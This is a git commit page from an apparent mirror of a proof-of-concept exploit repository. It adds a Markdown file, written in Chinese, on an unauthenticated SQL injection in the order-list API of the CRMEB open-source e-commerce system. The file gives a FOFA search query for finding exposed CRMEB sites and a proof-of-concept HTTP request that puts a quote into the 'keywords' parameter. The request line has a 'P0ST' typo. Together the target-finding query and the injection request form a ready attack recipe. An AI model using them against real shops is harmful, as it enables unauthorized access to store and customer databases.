mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
Create CRMEB开源电商系统orderlist存在SQL注入漏洞.md
This commit is contained in:
parent
ed48c1ec92
commit
d15e36e68f
17
wpoc/CRMEB/CRMEB开源电商系统orderlist存在SQL注入漏洞.md
Normal file
17
wpoc/CRMEB/CRMEB开源电商系统orderlist存在SQL注入漏洞.md
Normal file
@ -0,0 +1,17 @@
|
||||
## CRMEB开源电商系统orderlist存在SQL注入漏洞
|
||||
|
||||
CRMEB开源电商系统存在未授权sql注入漏洞
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
P0ST /api/admin/system/store/order/list?keywords=1' HTTP/1.1
|
||||
Host:
|
||||
Content-Type:application/x-www-form-urlencoded
|
||||
```
|
Loading…
x
Reference in New Issue
Block a user